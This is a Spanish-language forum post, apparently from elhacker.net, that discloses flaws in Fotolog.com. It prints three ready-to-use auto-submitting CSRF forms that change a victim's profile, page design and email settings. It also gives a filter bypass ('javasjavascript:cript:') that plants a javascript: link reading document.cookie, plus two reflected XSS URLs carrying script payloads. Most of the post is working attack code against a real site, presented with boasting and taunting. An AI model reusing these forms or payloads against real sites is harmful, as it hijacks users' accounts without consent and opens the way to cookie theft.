Fede_cp y Castg! Simple disclosure de Fotolog.com! xD

bueno bueno, que mas, les voy a contar TODO! porq quiero un post bien larguito xD! y en tambien esta en el blog este mismo post (osea apreto enviar, lo copio y pego en el blog xD!)

empiezo, taba en la casa de fede y me mostro un csrf para borrar comentarios de las fotos, bueno, pasa que este es re conocido :p y dijimos, bueno, ya encontramos 2 xss y un "ftp" de la api de fotolog(aunque no lo sepan, el genio de fede en el dominio http://si.fotolog.com/i94/ encontro que estaban habilitados los indexes de apache yse podia navegar por los codigos fuentes de fotolog xD! testigos: WHK y SDC) y los xss uno lo encontro fede hace banda en el "redirect=" del cambio de idioma y yo hace poco (solo funciona en IE) otro medio raro, pero no taban tan piolas, la cosa era encontrar mas, mejor cantidad y menos calidad. nos pusimos a ver el perfil y a modificarlo, nos dimos cuenta que no pedia contraseña como en otros casos, vimos el codigo fuente del formulario y tampoco tenia token.
Wow! copiamos el formulario y empezamos a depurar, ni bien empezamos nos tubimos que ir (para mi casa xD!) y aca (en mi casa ;-)

) despues de boludear y boludear, encontramos otro csrf, pero no depuramos nada ni tampoco usamos el otro fichero, el de la casa de fede.

entonces hoy agarro y digo (ya solito en mi casa y fede en la suya) postiemos los 2 CSRF en elhacker.net asi [ego]ven que tanto inteligentes somos![/ego] y cunado me pongo a buscar los formularios, a depurar (que llevo su tiempo la verdad!!) y todo eso, me propongo buscar mas csrf, y encontre uno mas, boludiando por el perfil tambien me di cuenta que baypaseando se puede agregar un link a: "javascript:alert(1)" y por ultimo encontre otro xss. al ver esto decimos, en que garcha subimos nuestras fotos?, y si, es una garcha. jajaj. ahora voy a poner los formularios de los CSRF seguido de como baypasear y despues donde esta el xss.
Guarda con los formularios porq se mandan solos automaticamente se abren...

1er formulario: (este modifica los datos personales...)

Código

<body onload="document.update_prefs.submit()">
<form id="settings" action="http://account.fotolog.com/profile" name="update_prefs" method="post" enctype="multipart/form-data">
<input type="hidden" class="checkbox" id="display_bio" name="display_bio" checked value="true">
<input type="hidden" id="bio_statement" name="bio_statement" wrap="virtual" value="Te cabieron el pote!">
<input type="hidden" class="checkbox" id="display_image" name="display_image" checked value="false">
<input type="hidden" id="image" name="image" class="lg">
<input type="hidden" id="firstname" name="firstname" class="lg" value="Me ponwearon" maxlength="32">
<input type="hidden" id="lastname" name="lastname" class="lg" value="Fede_cp y Castg" maxlength="32">
<input type="hidden" class="radio" name="gender" id="g_0" value="0">
<input type="hidden" class="radio" name="gender" id="g_1" value="1">
<input type="hidden" class="radio" name="gender" id="g_2" value="2">
<input type="hidden" id="profession" name="profession" class="lg" value="Ser powneado :'(" maxlength="40">
<input type="hidden" class="med" name="new:plink:0:name" value="Castg! y Fede_cp son los ***** amos!" maxlength="64">
<input type="hidden" class="med" name="new:plink:0:url" value="http://google.com" maxlength="64">
<input type="hidden" class="med" name="new:plink:1:name" value="xss no, terrible pelotudes see!!!" maxlength="64">
<input type="hidden" class="med" name="new:plink:1:url" value="javasjavascript:cript:alert(document.cookie)" maxlength="64">
<input type="hidden" class="checkbox" name="delete:new:plink:0">
<input type="hidden" class="checkbox" name="delete:new:plink:1">
<input type="hidden" name="new:plink:1" value="1">
<input type="hidden" id="country" name="country" value="_N">
<input type="hidden" id="state" name="state" value="00">
<input type="hidden" name="city" id="city" maxlength="128" class="med" value="El ciber mundo!">
<input type="hidden" name="language" value="tr">
<input type="hidden" name="new:camera:0:type" value="3">
<input type="hidden" id="fotolog_description" name="fotolog_description" wrap="virtual" value=":P">
<input type="hidden" name="new:camera:0:brand" value="Logitech" class="sm" maxlength="32">
<input type="hidden" name="new:camera:0:model" value="¿?" class="sm" maxlength="32">
<input type="hidden" type="checkbox" name="delete:new:camera:0">
<input type="hidden" name="new:camera:0" value="1">
<input type="hidden" id="music" name="music" wrap="virtual" class="med" value="Reggae con un fasito!">
<input type="hidden" id="movies" name="movies" wrap="virtual" value="Garganta Profunda (busquen en el puto google ¬¬)">
<input type="hidden" id="sports" name="sports" wrap="virtual" value="Lucha en el barro!">
<input type="hidden" class="med" name="new:favlink:0:name" value="I'm cagado!" maxlength="64">
<input type="hidden" class="med" name="new:favlink:0:url" value="http://google.com" maxlength="64">
<input type="hidden" class="checkbox" name="delete:new:favlink:0">
<input type="hidden" name="new:favlink:0" value="1">
</form>
</body>

2do formulario: (este modifica los colores y titulo...)

Código

<body onload="document.update_prefs.submit()">
<form name="update_prefs" action="http://account.fotolog.com/page_design" id="settings" method="post" enctype="multipart/form-data">
<input type="hidden" name="title" value="Me cabieron el pote!">
<input type="hidden" name="margin_txt_color" value="FFFFFF">
<input type="hidden" name="margin_link_color" value="33FF00">
<input type="hidden" name="margin_bg_color" value="FFFF00">
<input type="hidden" name="text_color" value="FFFFFF">
<input type="hidden" name="hyperlink_text_color" value="FFFF00">
<input type="hidden" name="background_color" value="FFFF00">
</form>
</body>

3er formulario: (noticias por mail... "newlestter")

Código

<body onload="document.update_prefs.submit()">
<form name="update_prefs" method="post" enctype="multipart/form-data" id="settings">
<input type="hidden" name="receive_email_digest" value="true">
<input type="hidden" name="receive_updates" value="true">
<input type="hidden" name="receive_newsletter" value="true">
<input type="hidden" name="receive_promotionals" value="true">
</form>
</body>

la verdad son re boludos, pero quiera uno o no! jajaj

Bypass en URL: (el bypass lo descubrio favaloro, un medico argentino)

bueno, en http://account.fotolog.com/profile en la parte de enlaces personales ponen el nombre q se les cante, si son floggers ponegan "mail de cumbio" y pican al toq xD!, y en url si ponen javascript:alert(1); se los transforma en http://alert(1)/; entonces si ponemos javasjavascript:cript:alert(1); borra el javascript armado, uniendo los separados . entonces cuando ponen click en el "link" saltara un alert con el mesaje "1".

XSS: (aca no tengo nada para poner :p)

muy simple,
aca uno: (salta 5 veces) http://txn.fotolog.com/gift_store?u=%22%3E%3Cscript%3Ealert%28%27xss%20by%20castg%27%29;%3C/script%3E

aca otro parecido pero nomas que saltan 7 :P : http://txn.fotolog.com/gift_store?id=712&u=%22%3E%3Cscript%3Ealert(%27xss%20by%20castg%27);%3C/script%3E

bueno, este fue un capitulo de fede_castg, espero que les haya gustado y... chau. jajaj

Aviso que mande dos mails al webmaster, ahora q se jodan xD!